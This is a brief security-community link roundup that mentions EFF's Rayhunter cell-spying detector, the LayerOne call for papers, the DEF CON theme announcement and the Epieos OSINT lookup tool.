EFF - Meet Rayhunter: A New Open Source Tool from EFF to Detect Cellular Spying - Anecdotally, I took a train from Boston down to DC and back up last week with a Rayhunter running. The results were… interesting. Not conclusive, as Rayhunter’s brand new and there are many false-positive scenarios, but definitely interesting.

LayerOne - Call for Papers - open until April 12. 

DEF CON - Theme Drop: Access Everywhere - “This year we’re thinking about how to make information and services available to everyone. Available wherever you are, whoever you are, and usable no matter how you need to connect… Less walled gardens, more sunlight.”

Epieos - “The ultimate OSINT tool for email and phone reverse lookup” - Neat tool getting some good word-of-mouth lately.
